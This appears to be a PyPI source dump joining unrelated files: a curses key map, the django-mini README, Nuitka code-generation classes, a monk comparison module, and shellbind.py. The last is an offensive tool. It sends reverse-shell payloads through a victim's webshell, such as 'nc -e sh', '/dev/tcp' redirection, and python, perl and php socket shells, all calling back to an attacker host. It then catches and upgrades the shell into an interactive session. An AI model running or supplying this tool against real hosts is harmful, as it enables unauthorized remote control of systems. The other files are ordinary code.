    'exit' : (KEY_EXIT, MOD_NONE ),
    'find' : (KEY_FIND, MOD_NONE ),
    'help' : (KEY_HELP, MOD_NONE ),
    'home' : (KEY_HOME, MOD_NONE ),
    'ic' : (KEY_INSERT, MOD_NONE ),
    'left' : (KEY_LEFT, MOD_NONE ),
    'mark' : (KEY_MARK, MOD_NONE ),
    'message' : (KEY_MESSAGE, MOD_NONE ),
    'move' : (KEY_MOVE, MOD_NONE ),
    'next' : (KEY_PAGEDOWN, MOD_NONE ), # Not quite, but it's the best we can do
    'npage' : (KEY_PAGEDOWN, MOD_NONE ),
    'open' : (KEY_OPEN, MOD_NONE ),
    'options' : (KEY_OPTIONS, MOD_NONE ),
    'ppage' : (KEY_PAGEUP, MOD_NONE ),
    'previous' : (KEY_PAGEUP, MOD_NONE ), # Not quite, but it's the best we can do
    'print' : (KEY_PRINT, MOD_NONE ),
    'redo' : (KEY_REDO, MOD_NONE ),
    'reference' : (KEY_REFERENCE, MOD_NONE ),
    'refresh' : (KEY_REFRESH, MOD_NONE ),
    'replace' : (KEY_REPLACE, MOD_NONE ),
    'restart' : (KEY_RESTART, MOD_NONE ),
    'resume' : (KEY_RESUME, MOD_NONE ),
    'right' : (KEY_RIGHT, MOD_NONE ),
    'save' : (KEY_SAVE, MOD_NONE ),
    'select' : (KEY_SELECT, MOD_NONE ),
    'suspend' : (KEY_SUSPEND, MOD_NONE ),
    'undo' : (KEY_UNDO, MOD_NONE ),
    'up' : (KEY_UP, MOD_NONE ),
}
|
PypiClean
|
/django-mini-0.5.1.tar.gz/django-mini-0.5.1/README.rst
|
django-mini
===========
Django-mini is an MIT-licensed command-line utility for running `Django`_ management commands without a settings module. It is intended to help developers run and test stand-alone Django apps.
.. _Django: https://www.djangoproject.com/
Installation
------------
Install using pip from PyPI::
pip install django-mini
Alternatively, `download the source`_, unpack it and install it like a typical Python distribution::
python setup.py install
The installation consists of a single pure-Python module called ``djangomini`` and an executable script ``django-mini.py``. Django-mini assumes a recent version of Django is already installed.
Basic Usage
-----------
Django-mini has a few flags for configuring Django settings, and then any other arguments are passed to Django's management utility so it can do its stuff.
- ``--database <database>`` - to specify the default database.
- ``--app <appname>`` - adds your app package to Django's ``INSTALLED_APPS``.
- ``--admin`` - adds Django's built-in admin and its requirements.
- ``--debug-toolbar`` - adds Rob Hudson's `django-debug-toolbar`_ and its requirements.
- ``-p`` or ``--persisting`` - use an sqlite database named ``djangomini.sqlite``.
.. _django-debug-toolbar: https://github.com/django-debug-toolbar/django-debug-toolbar
If you neither use the persisting option nor specify a database, django-mini will use an in-memory sqlite database (meaning it will be destroyed when the command finishes).
To run Django with your app and the built-in admin, use a named database::
django-mini.py --database /tmp/django.sqlite --admin --app myapp syncdb
django-mini.py --database /tmp/django.sqlite --admin --app myapp runserver
Or use the persisting option::
django-mini.py -p --admin syncdb
django-mini.py -p --admin runserver
That will start Django's development server with the admin. The admin application will be available at ``http://localhost:8000/admin/`` and all other requests will be directed to your app, i.e. your app's ``myapp.urls`` is configured to serve all other requests.
`The full documentation`_ has more examples of use, including how to use other databases, how to change any setting, and how to mount an app at a particular URL.
.. _The full documentation: https://github.com/davidwtbuxton/django-mini/blob/master/docs/index.rst
.. _Download the source: https://github.com/davidwtbuxton/django-mini
|
PypiClean
|
/Nuitka-1.8.tar.gz/Nuitka-1.8/nuitka/code_generation/c_types/CTypePyObjectPointers.py
|
from nuitka.__past__ import iterItems, xrange
from nuitka.code_generation.ErrorCodes import (
getErrorExitBoolCode,
getReleaseCode,
)
from nuitka.code_generation.templates.CodeTemplatesVariables import (
template_del_local_intolerant,
template_del_local_known,
template_del_local_tolerant,
template_del_shared_intolerant,
template_del_shared_known,
template_del_shared_tolerant,
template_release_object_clear,
template_release_object_unclear,
template_write_local_clear_ref0,
template_write_local_clear_ref1,
template_write_local_empty_ref0,
template_write_local_empty_ref1,
template_write_local_inplace,
template_write_local_unclear_ref0,
template_write_local_unclear_ref1,
template_write_shared_clear_ref0,
template_write_shared_clear_ref1,
template_write_shared_inplace,
template_write_shared_unclear_ref0,
template_write_shared_unclear_ref1,
)
from nuitka.Constants import getConstantValueGuide, isMutable
from .CTypeBases import CTypeBase
# Need to run "bin/generate-specialized-c-code" when changing these values.
# List constants below the direct threshold are emitted as MAKE_LISTn(...) with
# every element passed as an argument; sizes up to the hinted threshold use a
# size-specific MAKE_LISTn(constant); larger ones fall back to LIST_COPY.
make_list_constant_direct_threshold = 4
make_list_constant_hinted_threshold = 13
class CPythonPyObjectPtrBase(CTypeBase):
    """Shared C code generation for PyObject-pointer based C types."""

    @classmethod
    def emitVariableAssignCode(
        cls, value_name, needs_release, tmp_name, ref_count, inplace, emit, context
    ):
        # Choose the write template by three axes: in-place vs. plain
        # assignment, whether the new value transfers a reference
        # (ref_count), and whether the old value needs releasing
        # (True / False / None meaning unknown).
        if inplace:
            # Releasing is not an issue here, local variable reference never
            # gave a reference, and the in-place code deals with possible
            # replacement/release.
            template = template_write_local_inplace
        else:
            if ref_count:
                if needs_release is False:
                    template = template_write_local_empty_ref0
                elif needs_release is True:
                    template = template_write_local_clear_ref0
                else:
                    template = template_write_local_unclear_ref0
            else:
                if needs_release is False:
                    template = template_write_local_empty_ref1
                elif needs_release is True:
                    template = template_write_local_clear_ref1
                else:
                    template = template_write_local_unclear_ref1
        emit(template % {"identifier": value_name, "tmp_name": tmp_name})

    @classmethod
    def emitAssignmentCodeToNuitkaIntOrLong(
        cls, to_name, value_name, needs_check, emit, context
    ):
        # Delegate to the target's C type; the object value is given, no
        # pre-computed int value is available here.
        to_type = to_name.getCType()
        to_type.emitVariantAssignmentCode(
            int_name=to_name,
            value_name=value_name,
            int_value=None,
            emit=emit,
            context=context,
        )

    @classmethod
    def getTruthCheckCode(cls, value_name):
        # C expression that is true when the object is truthy.
        return "CHECK_IF_TRUE(%s) == 1" % value_name

    @classmethod
    def emitTruthCheckCode(cls, to_name, value_name, emit):
        assert to_name.c_type == "int", to_name
        emit("%s = CHECK_IF_TRUE(%s);" % (to_name, value_name))

    @classmethod
    def getReleaseCode(cls, value_name, needs_check, emit):
        # "unclear" tolerates NULL; "clear" assumes the value is set.
        if needs_check:
            template = template_release_object_unclear
        else:
            template = template_release_object_clear
        emit(template % {"identifier": value_name})

    @classmethod
    def emitAssignInplaceNegatedValueCode(cls, to_name, needs_check, emit, context):
        # Half way, virtual method: pylint: disable=unused-argument
        update_code = "%(to_name)s = (%(truth_check)s) ? Py_False : Py_True" % {
            "truth_check": cls.getTruthCheckCode(to_name),
            "to_name": to_name,
        }
        if context.needsCleanup(to_name):
            # The release here can only work for this class, needs more work to be able
            # to deal with CTypePyObjectPtrPtr and CTypeCellObject.
            assert cls is CTypePyObjectPtr
            emit(
                """\
{
%(tmp_decl)s = %(to_name)s;
%(update_code)s;
Py_INCREF(%(to_name)s);
Py_DECREF(old);
}
"""
                % {
                    "tmp_decl": cls.getVariableArgDeclarationCode("old"),
                    "update_code": update_code,
                    "to_name": to_name,
                }
            )
        else:
            emit("%s;" % update_code)

    @classmethod
    def emitAssignmentCodeToNuitkaBool(
        cls, to_name, value_name, needs_check, emit, context
    ):
        # CHECK_IF_TRUE returns -1 on error, which is routed to the error exit.
        truth_name = context.allocateTempName("truth_name", "int")
        emit("%s = CHECK_IF_TRUE(%s);" % (truth_name, value_name))
        getErrorExitBoolCode(
            condition="%s == -1" % truth_name,
            needs_check=needs_check,
            emit=emit,
            context=context,
        )
        emit(
            "%s = %s == 0 ? NUITKA_BOOL_FALSE : NUITKA_BOOL_TRUE;"
            % (to_name, truth_name)
        )

    @classmethod
    def emitAssignmentCodeFromConstant(
        cls, to_name, constant, may_escape, emit, context
    ):
        # Emits C code assigning a compile-time constant. When the value may
        # escape to user code, mutable constants are copied (deep-copied when
        # they contain mutable elements) so the shared constant stays intact.
        # ref_count records whether the produced expression owns a reference.
        # Many cases to deal with, pylint: disable=too-many-branches,too-many-statements
        if type(constant) is dict:
            if not may_escape:
                code = context.getConstantCode(constant)
                ref_count = 0
            elif constant:
                for key, value in iterItems(constant):
                    # key cannot be mutable.
                    assert not isMutable(key)
                    if isMutable(value):
                        needs_deep = True
                        break
                else:
                    needs_deep = False
                if needs_deep:
                    code = "DEEP_COPY_DICT(tstate, %s)" % context.getConstantCode(
                        constant, deep_check=False
                    )
                    ref_count = 1
                else:
                    code = "DICT_COPY(%s)" % context.getConstantCode(
                        constant, deep_check=False
                    )
                    ref_count = 1
            else:
                code = "MAKE_DICT_EMPTY()"
                ref_count = 1
        elif type(constant) is set:
            if not may_escape:
                code = context.getConstantCode(constant)
                ref_count = 0
            elif constant:
                code = "PySet_New(%s)" % context.getConstantCode(constant)
                ref_count = 1
            else:
                code = "PySet_New(NULL)"
                ref_count = 1
        elif type(constant) is list:
            if not may_escape:
                code = context.getConstantCode(constant)
                ref_count = 0
            elif constant:
                for value in constant:
                    if isMutable(value):
                        needs_deep = True
                        break
                else:
                    needs_deep = False
                if needs_deep:
                    code = 'DEEP_COPY_LIST_GUIDED(tstate, %s, "%s")' % (
                        context.getConstantCode(constant, deep_check=False),
                        getConstantValueGuide(constant, elements_only=True),
                    )
                    ref_count = 1
                else:
                    constant_size = len(constant)
                    # All-identical elements use the repeat helper; small lists
                    # pass elements directly; medium lists use the size-hinted
                    # maker; large ones plain LIST_COPY (see thresholds above).
                    if constant_size > 1 and all(
                        constant[i] is constant[0] for i in xrange(1, len(constant))
                    ):
                        code = "MAKE_LIST_REPEATED(%s, %s)" % (
                            constant_size,
                            context.getConstantCode(constant[0], deep_check=False),
                        )
                    elif constant_size < make_list_constant_direct_threshold:
                        code = "MAKE_LIST%d(%s)" % (
                            constant_size,
                            ",".join(
                                context.getConstantCode(constant[i], deep_check=False)
                                for i in xrange(constant_size)
                            ),
                        )
                    elif constant_size < make_list_constant_hinted_threshold:
                        code = "MAKE_LIST%d(%s)" % (
                            constant_size,
                            context.getConstantCode(constant, deep_check=False),
                        )
                    else:
                        code = "LIST_COPY(%s)" % context.getConstantCode(
                            constant, deep_check=False
                        )
                    ref_count = 1
            else:
                # TODO: For the zero elements list, maybe have a dedicated function, which
                # avoids a bit of tests, not sure we want LTO do this.
                code = "MAKE_LIST_EMPTY(0)"
                ref_count = 1
        elif type(constant) is tuple:
            # Tuples only need copying when they contain mutable elements.
            needs_deep = False
            if may_escape:
                for value in constant:
                    if isMutable(value):
                        needs_deep = True
                        break
            if needs_deep:
                code = 'DEEP_COPY_TUPLE_GUIDED(tstate, %s, "%s")' % (
                    context.getConstantCode(constant, deep_check=False),
                    getConstantValueGuide(constant, elements_only=True),
                )
                ref_count = 1
            else:
                code = context.getConstantCode(constant)
                ref_count = 0
        elif type(constant) is bytearray:
            if may_escape:
                code = "BYTEARRAY_COPY(tstate, %s)" % context.getConstantCode(constant)
                ref_count = 1
            else:
                code = context.getConstantCode(constant)
                ref_count = 0
        else:
            code = context.getConstantCode(constant=constant)
            ref_count = 0
        # Assign directly when the target is a plain object pointer, otherwise
        # go through a temporary and a conversion step.
        if to_name.c_type == "PyObject *":
            value_name = to_name
        else:
            value_name = context.allocateTempName("constant_value")
        emit("%s = %s;" % (value_name, code))
        if to_name is not value_name:
            cls.emitAssignConversionCode(
                to_name=to_name,
                value_name=value_name,
                needs_check=False,
                emit=emit,
                context=context,
            )
            # Above is supposed to transfer ownership.
            if ref_count:
                getReleaseCode(value_name, emit, context)
        else:
            if ref_count:
                context.addCleanupTempName(value_name)
class CTypePyObjectPtr(CPythonPyObjectPtrBase):
    """C type for a plain "PyObject *" variable; NULL means unassigned.

    Note: the previous byte-identical override of getReleaseCode was removed;
    the inherited CPythonPyObjectPtrBase implementation is used instead.
    """

    c_type = "PyObject *"
    helper_code = "OBJECT"

    @classmethod
    def getInitValue(cls, init_from):
        # NULL marks "not yet assigned".
        if init_from is None:
            return "NULL"
        else:
            return init_from

    @classmethod
    def getInitTestConditionCode(cls, value_name, inverted):
        # C condition testing whether the variable is (not) initialized.
        return "%s %s NULL" % (value_name, "==" if inverted else "!=")

    @classmethod
    def emitReinitCode(cls, value_name, emit):
        emit("%s = NULL;" % value_name)

    @classmethod
    def getVariableArgDeclarationCode(cls, variable_code_name):
        return "PyObject *%s" % variable_code_name

    @classmethod
    def getVariableArgReferencePassingCode(cls, variable_code_name):
        # Passed by address so the callee can write through the pointer.
        return "&%s" % variable_code_name

    @classmethod
    def getCellObjectAssignmentCode(cls, target_cell_code, variable_code_name, emit):
        # Wrap the value in a fresh cell without taking an extra reference.
        emit("%s = Nuitka_Cell_New0(%s);" % (target_cell_code, variable_code_name))

    @classmethod
    def getDeleteObjectCode(
        cls, to_name, value_name, needs_check, tolerant, emit, context
    ):
        # "known" assumes the value is set; "tolerant" ignores unset values;
        # "intolerant" reports failure through the result variable.
        if not needs_check:
            emit(template_del_local_known % {"identifier": value_name})
        elif tolerant:
            emit(template_del_local_tolerant % {"identifier": value_name})
        else:
            emit(
                template_del_local_intolerant
                % {"identifier": value_name, "result": to_name}
            )

    @classmethod
    def emitAssignmentCodeFromBoolCondition(cls, to_name, condition, emit):
        emit(
            "%(to_name)s = (%(condition)s) ? Py_True : Py_False;"
            % {"to_name": to_name, "condition": condition}
        )

    @classmethod
    def emitValueAccessCode(cls, value_name, emit, context):
        # Nothing to do for this type, pylint: disable=unused-argument
        return value_name

    @classmethod
    def emitValueAssertionCode(cls, value_name, emit):
        emit("CHECK_OBJECT(%s);" % value_name)

    @classmethod
    def emitAssignConversionCode(cls, to_name, value_name, needs_check, emit, context):
        # Convert from same type, boolean C types, or nuitka_ilong; anything
        # else is a code generation error.
        if value_name.c_type == cls.c_type:
            emit("%s = %s;" % (to_name, value_name))
            context.transferCleanupTempName(value_name, to_name)
        elif value_name.c_type in ("nuitka_bool", "bool"):
            cls.emitAssignmentCodeFromBoolCondition(
                condition=value_name.getCType().getTruthCheckCode(value_name),
                to_name=to_name,
                emit=emit,
            )
        elif value_name.c_type == "nuitka_ilong":
            emit("ENFORCE_ILONG_OBJECT_VALUE(&%s);" % value_name)
            emit("%s = %s.ilong_object;" % (to_name, value_name))
            context.transferCleanupTempName(value_name, to_name)
        else:
            assert False, to_name.c_type

    @classmethod
    def getExceptionCheckCondition(cls, value_name):
        # NULL is the error indicator for object producing expressions.
        return "%s == NULL" % value_name

    @classmethod
    def hasErrorIndicator(cls):
        return True

    @classmethod
    def getTakeReferenceCode(cls, value_name, emit):
        """Take reference code for given object."""
        emit("Py_INCREF(%s);" % value_name)
class CTypePyObjectPtrPtr(CPythonPyObjectPtrBase):
    """C type for a "PyObject **" variable, accessed through dereference."""

    c_type = "PyObject **"

    @classmethod
    def getInitTestConditionCode(cls, value_name, inverted):
        # Test the pointed-to object, not the pointer itself.
        return "*%s %s NULL" % (value_name, "==" if inverted else "!=")

    @classmethod
    def getVariableArgDeclarationCode(cls, variable_code_name):
        return "PyObject **%s" % variable_code_name

    @classmethod
    def getVariableArgReferencePassingCode(cls, variable_code_name):
        # Already a pointer, pass as-is.
        return variable_code_name

    @classmethod
    def emitValueAccessCode(cls, value_name, emit, context):
        # No code needed for this type, pylint: disable=unused-argument
        from ..VariableDeclarations import VariableDeclaration

        # Use the object pointed to.
        return VariableDeclaration("PyObject *", "*%s" % value_name, None, None)

    @classmethod
    def emitAssignmentCodeFromBoolCondition(cls, to_name, condition, emit):
        emit(
            "*%(to_name)s = (%(condition)s) ? Py_True : Py_False;"
            % {"to_name": to_name, "condition": condition}
        )
class CTypeCellObject(CTypeBase):
    """C type for closure cell variables, "struct Nuitka_CellObject *"."""

    c_type = "struct Nuitka_CellObject *"

    @classmethod
    def getInitValue(cls, init_from):
        # TODO: Single out "init_from" only user, so it becomes sure that we
        # get a reference transferred here in these cases.
        if init_from is None:
            return "Nuitka_Cell_Empty()"
        return "Nuitka_Cell_New1(%s)" % init_from

    @classmethod
    def getInitTestConditionCode(cls, value_name, inverted):
        # The cell itself always exists; initialization is judged by its
        # contained object reference.
        operator = "==" if inverted else "!="
        return "%s->ob_ref %s NULL" % (value_name, operator)

    @classmethod
    def getCellObjectAssignmentCode(cls, target_cell_code, variable_code_name, emit):
        # Share the cell and take a reference on behalf of the target.
        emit("%s = %s;" % (target_cell_code, variable_code_name))
        emit("Py_INCREF(%s);" % target_cell_code)

    @classmethod
    def emitVariableAssignCode(
        cls, value_name, needs_release, tmp_name, ref_count, inplace, emit, context
    ):
        if inplace:
            # Releasing is not an issue here, local variable reference never
            # gave a reference, and the in-place code deals with possible
            # replacement/release.
            template = template_write_shared_inplace
        elif ref_count:
            # Reference is transferred; pick clear/unclear by prior state.
            template = (
                template_write_shared_clear_ref0
                if needs_release is False
                else template_write_shared_unclear_ref0
            )
        else:
            # No reference transferred; pick clear/unclear by prior state.
            template = (
                template_write_shared_clear_ref1
                if needs_release is False
                else template_write_shared_unclear_ref1
            )
        emit(template % {"identifier": value_name, "tmp_name": tmp_name})

    @classmethod
    def emitValueAccessCode(cls, value_name, emit, context):
        # No code needed for this type, pylint: disable=unused-argument
        from ..VariableDeclarations import VariableDeclaration

        # Read access goes through the cell indirection.
        return VariableDeclaration(
            "PyObject *", "Nuitka_Cell_GET(%s)" % value_name, None, None
        )

    @classmethod
    def getVariableArgDeclarationCode(cls, variable_code_name):
        """C declaration used when receiving this variable as an argument."""
        return "struct Nuitka_CellObject *" + str(variable_code_name)

    @classmethod
    def getVariableArgReferencePassingCode(cls, variable_code_name):
        # Cells are shared by pointer already, pass through unchanged.
        return variable_code_name

    @classmethod
    def emitAssignmentCodeFromBoolCondition(cls, to_name, condition, emit):
        # Store a borrowed singleton into the cell's object slot.
        emit("%s->ob_ref = (%s) ? Py_True : Py_False;" % (to_name, condition))

    @classmethod
    def getDeleteObjectCode(
        cls, to_name, value_name, needs_check, tolerant, emit, context
    ):
        # Select the delete template: known-set, tolerant of unset, or
        # intolerant (reports failure through "to_name").
        if not needs_check:
            emit(template_del_shared_known % {"identifier": value_name})
        elif tolerant:
            emit(template_del_shared_tolerant % {"identifier": value_name})
        else:
            emit(
                template_del_shared_intolerant
                % {"identifier": value_name, "result": to_name}
            )

    @classmethod
    def getReleaseCode(cls, value_name, needs_check, emit):
        """Emit a release of the cell; the "unclear" variant tolerates NULL."""
        chosen = (
            template_release_object_unclear
            if needs_check
            else template_release_object_clear
        )
        emit(chosen % {"identifier": value_name})

    @classmethod
    def emitReinitCode(cls, value_name, emit):
        # Forget the cell; ownership was transferred elsewhere.
        emit("%s = NULL;" % value_name)

    @classmethod
    def emitValueAssertionCode(cls, value_name, emit):
        # Assert the contained object, not merely the cell.
        emit("CHECK_OBJECT(%s->ob_ref);" % value_name)

    @classmethod
    def emitReleaseAssertionCode(cls, value_name, emit):
        # Assert the cell object itself is valid before releasing.
        emit("CHECK_OBJECT(%s);" % value_name)
|
PypiClean
|
/shellbind-1.3.0.tar.gz/shellbind-1.3.0/shellbind.py
|
import requests
import argparse
import sys
import readline
import nclib
import tty
import time
import os
import multiprocessing
import random
import string
# Parse command line arguments. Help strings are user-facing; keep them
# free of typos ("program", "that is used", "sent").
parser = argparse.ArgumentParser(description="Shellbind is a program that helps to upgrade a simple GET/POST webshell into a semi- or fully-interactive (reverse) shell.", epilog="Examples:\n-Semi interactive shell (no cd, su, etc.)\n\tshellbind.py -X POST -p cmd -u http://vuln.example/shell.php\n-Fully interactive shell with verbose output\n\tshellbind.py -p cmd -u http://vuln.example/shell.py -v -r auto:10.10.13.37:8080", formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("-p", "--parameter", metavar="PARAMETER NAME", dest="para_name", help="The parameter that is used to run shell commands", required=True)
parser.add_argument("-X", "--method", metavar="METHOD", dest="method", help="The method (GET/POST) that is used (Default: GET)", default="GET")
parser.add_argument("-u", "--host", dest="host", metavar="HOST", help="The host that is attacked.\nExample: http://www.victim.com/vuln.php", required=True)
parser.add_argument("-v", "--verbose", dest="debug", help="Verbose Output", action='store_true', default=False)
parser.add_argument("-r", "--reverse", dest="reverse", help="If set the program upgrades the connection from a webshell to a fully-interactive reverse shell.\nAvailable methods are:\n auto - Try until a reverse shell binds\n php - php reverseshell\n py - python3 reverse shell with sockets\n py2 - python2 reverse shell with sockets\n nc1 - netcat reverse shell with -e flag\n nc2 - netcat reverse shell with -c flag\n bash - sh -i reverse shell\n perl - perl reverse shell\nLHOST should be the ip that the victim can connect to\nThe port can be any unused port", metavar="METHOD:LHOST:PORT")
parser.add_argument("--prefix", dest="prefix", help="Set a prefix that is sent before every command in case of semi-interactive or once for the reverse shell if fully-interactive", default="")
parser.add_argument("--postfix", dest="postfix", help="Set a postfix that is sent after every command in case of semi-interactive or once for the reverse shell if fully-interactive", default="")
parser.add_argument("-c", "--clean", dest="clean", help="Clean output from trash like html (Does not work with Windows CMD)", action='store_true', default=False)
args = parser.parse_args()
# Initialize listener and start trying reverse shell payloads
def init_upgraded_shell():
    """Upgrade the webshell into a fully-interactive reverse shell.

    Validates the HTTP method, parses the METHOD:LHOST:PORT specification
    from --reverse, starts a child process that fires reverse-shell payloads
    at the target, and hands control to the local listener.
    """
    args.method = args.method.upper()
    if args.method not in ["GET", "POST"]:
        print(f"[!] Method {args.method} not recognized")
        sys.exit()
    # Parse METHOD:LHOST:PORT in a narrow try, so that a ValueError raised
    # later (inside the listener/shell phase) is not misreported as a parse
    # failure, which the previous whole-body try/except did.
    try:
        payload_method, ip, port = args.reverse.split(":")
        port = int(port)
    except ValueError:
        print("[!] Could not parse METHOD:IP:PORT")
        return
    # Payloads from revshells.com
    payloads = {
                "py": f"""python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'""",
                "py2": f"""python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'""",
                "nc1": f"""nc {ip} {port} -e sh""",
                "nc2": f"""nc -c sh {ip} {port}""",
                "bash": f"""sh -i >& /dev/tcp/{ip}/{port} 0>&1""",
                "perl": f"""perl -e 'use Socket;$i="{ip}";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");}};'""",
                "php": f"""php -r '$sock=fsockopen("{ip}",{port});exec("sh <&3 >&3 2>&3");'"""
                }
    if payload_method not in payloads and payload_method != 'auto':
        print("[!] Method not found")
        sys.exit()
    # Fire payloads from a child process while this process listens.
    p = multiprocessing.Process(target=back_call, args=[payload_method, ip, port, payloads])
    p.start()
    interactive_shell(ip, port, p)
# Tries to call back to listener with given payloads or tries everything if set to auto
def back_call(payload_method, ip, port, payloads):
    """Run in a child process: send reverse-shell payload(s) to the target.

    Each payload is sent through the configured GET/POST webshell parameter
    with a short timeout. A successful payload typically never returns an
    HTTP response (the request hangs while the shell connects back), so
    timeouts and request errors are expected and ignored.
    """
    time.sleep(1)  # give the parent a moment to bind the listener
    timeout = 1

    def fire(payload):
        # Send one payload through the webshell; errors are non-fatal.
        # Catch Exception (not a bare "except:") so that KeyboardInterrupt /
        # SystemExit still terminate the child process.
        try:
            if args.debug:
                print(f"[!] Trying: {payload}")
            params = {args.para_name: payload}
            if args.method == "GET":
                requests.get(args.host, params=params, timeout=timeout)
            elif args.method == "POST":
                requests.post(args.host, data=params, timeout=timeout)
            time.sleep(1)
        except Exception:
            pass

    if payload_method == 'auto':
        for payload in payloads.values():
            fire(args.prefix + payload + args.postfix)
    else:
        # Apply prefix/postfix here as well; previously only the "auto" path
        # honored them, contradicting the documented --prefix/--postfix help.
        fire(args.prefix + payloads[payload_method] + args.postfix)
    # Reaching this point means no payload hung the request open.
    print(f"[!] Method {payload_method} was not successful")
    print(f"[!] Could not call back")
# Listens on given port and catches reverse shell. Then proceeds to upgrade it.
def interactive_shell(ip, port, child_process):
    # Bind a listener on (ip, port) and block until the reverse shell
    # connects; Ctrl-C while waiting also tears down the payload-firing child.
    try:
        print("[!] Starting listener")
        nc = nclib.Netcat(listen=(ip, port))
    except KeyboardInterrupt:
        child_process.terminate()
        sys.exit()
    # A connection arrived -- stop firing further payloads.
    child_process.terminate()
    if args.debug:
        print("[!] Backcall Process Terminates. Received Shell")
    # Put the local terminal (stdin, fd 0) into raw mode so control characters
    # (tab completion, ^C, arrow keys) are forwarded to the remote shell
    # instead of being handled locally.
    tty.setraw(0)
    columns, rows = os.get_terminal_size()
    nc.send("\n")
    # Match the remote PTY size to the local terminal, upgrade to a proper
    # PTY via python3, then reset the remote terminal state.
    # NOTE(review): assumes python3 exists on the victim -- confirm fallback.
    nc.send(f"stty rows {rows} cols {columns}\n")
    nc.send('''python3 -c "import pty;pty.spawn('/bin/bash')"\n''')
    time.sleep(1)
    nc.send("reset\n")
    nc.interactive()
def web_shell():
    """Semi-interactive command loop over the GET/POST webshell.

    Reads commands from stdin, sends each through the configured request
    parameter, and prints the HTTP response body. With --clean, each command
    is wrapped between two randomly generated echoed markers so that
    surrounding junk (e.g. HTML) can be stripped from the output.
    """
    args.method = args.method.upper()
    if args.method not in ["GET", "POST"]:
        print(f"[!] Method {args.method} not recognized")
        sys.exit()
    if args.debug:
        print("[!] Shellbind is ready. You can run commands now")
    # Random markers echoed above/below the real output, used to strip junk.
    upper_seq = ""
    lower_seq = ""
    command_upper = ""
    command_lower = ""
    if args.clean:
        upper_seq = "".join([random.choice(string.ascii_uppercase) for x in range(16)])
        lower_seq = "".join([random.choice(string.ascii_uppercase) for x in range(16)])
        command_upper = "echo " + upper_seq + ";"
        command_lower = "; echo " + lower_seq + ";"
    # Command loop
    while True:
        try:
            command = input("$ ")
            command = args.prefix + command_upper + command + command_lower + args.postfix
            params = {args.para_name: command}
            if args.method == "GET":
                res = requests.get(args.host, params=params)
            else:
                res = requests.post(args.host, data=params)
            out = res.text
            if args.clean:
                # Keep only the text between the two echoed markers. If a
                # marker is missing (the command produced no echo, or the
                # target mangled the output), fall back to printing the raw
                # response instead of crashing the loop with an IndexError.
                try:
                    out = out.split(upper_seq + "\n")[1]
                    out = out.split(lower_seq + "\n")[0]
                except IndexError:
                    pass
            print(out)
        except requests.ConnectionError:
            host = args.host.replace("\n", "")
            print(f"[!] Connection to {host} not possible")
            sys.exit()
        except KeyboardInterrupt:
            if args.debug:
                print("[!] Exiting Connection to webshell")
            sys.exit()
if __name__ == '__main__':
    # Fully-interactive reverse shell when --reverse is given, otherwise the
    # plain semi-interactive webshell loop.
    if args.reverse is None:
        web_shell()
    else:
        init_upgraded_shell()
|
PypiClean
|
/monk_keras_cpu-0.0.1-py3-none-any.whl/monk/compare_prototype.py
|
from monk.system.imports import *
from monk.system.base_class import system
from monk.system.common import read_json
from monk.system.graphs.line import training_accuracy_curve
from monk.system.graphs.line import validation_accuracy_curve
from monk.system.graphs.line import training_loss_curve
from monk.system.graphs.line import validation_loss_curve
from monk.system.graphs.bar import training_time_plot
from monk.system.graphs.bar import max_accuracy_plot
from monk.system.graphs.bar import max_gpu_usage_plot
class compare(system):
    '''
    Class to compare and analyse multiple experiments.

    Args:
        verbose (int): Set verbosity levels
                        0 - Print Nothing
                        1 - Print desired details
    '''
    # NOTE: the @accepts / @error_checks decorators come in via wildcard
    # import from monk.system.imports and validate arguments at call time.

    @accepts("self", verbose=int, post_trace=False)
    #@TraceFunction(trace_args=True, trace_rv=True)
    def __init__(self, verbose=1):
        # Delegate all state setup (system_dict etc.) to the base class.
        super().__init__(verbose=verbose)

    @error_checks(None, ["name", ["A-Z", "a-z", "0-9", "-", "_"]], post_trace=False)
    @accepts("self", str, post_trace=False)
    #@TraceFunction(trace_args=True, trace_rv=True)
    def Comparison(self, comparison_name):
        '''
        Create comparison project to compare and analyse multiple experiments

        Args:
            comparison_name (str): Project Name

        Returns:
            None
        '''
        self.set_system_comparison(comparison_name);
        self.custom_print("Comparison: - {}".format(comparison_name));

    @accepts("self", str, str, post_trace=False)
    #@TraceFunction(trace_args=True, trace_rv=True)
    def Add_Experiment(self, project_name, experiment_name):
        '''
        Add experiment for comparison

        Args:
            project_name (str): Project Name
            experiment_name (str): Experiment Name

        Returns:
            None
        '''
        # Every experiment is tracked through its serialized state file.
        json_file = self.system_dict["master_systems_dir_relative"] + project_name + "/" + experiment_name + "/experiment_state.json";
        if(not os.path.isfile(json_file)):
            msg = "Project - {}, Experiment - {} does not exist".format(project_name, experiment_name)
            raise ConstraintError(msg)
        self.system_dict["local"]["experiments_list"].append(json_file);
        self.system_dict["local"]["project_experiment_list"].append(project_name + ":" + experiment_name);
        self.custom_print("Project - {}, Experiment - {} added".format(project_name, experiment_name));

    @accepts("self", post_trace=False)
    #@TraceFunction(trace_args=True, trace_rv=True)
    def Generate_Statistics(self):
        '''
        Generate comparison statistics: accuracy/loss curves, bar plots,
        and a summary CSV table covering every added experiment.

        Args:
            None

        Returns:
            None
        '''
        self.custom_print("Generating statistics...");
        # Load the saved state of every registered experiment.
        data = [];
        for i in range(len(self.system_dict["local"]["experiments_list"])):
            fname = self.system_dict["local"]["experiments_list"][i];
            system_dict = read_json(fname);
            data.append(system_dict);
        # Line plots: training/validation accuracy and loss.
        training_accuracy_curve(data, self.system_dict);
        validation_accuracy_curve(data, self.system_dict);
        training_loss_curve(data, self.system_dict);
        validation_loss_curve(data, self.system_dict);
        # Bar plots: training time, best accuracy, peak GPU usage.
        training_time_plot(data, self.system_dict);
        max_accuracy_plot(data, self.system_dict);
        max_gpu_usage_plot(data, self.system_dict);
        # table
        table = [];
        #headers
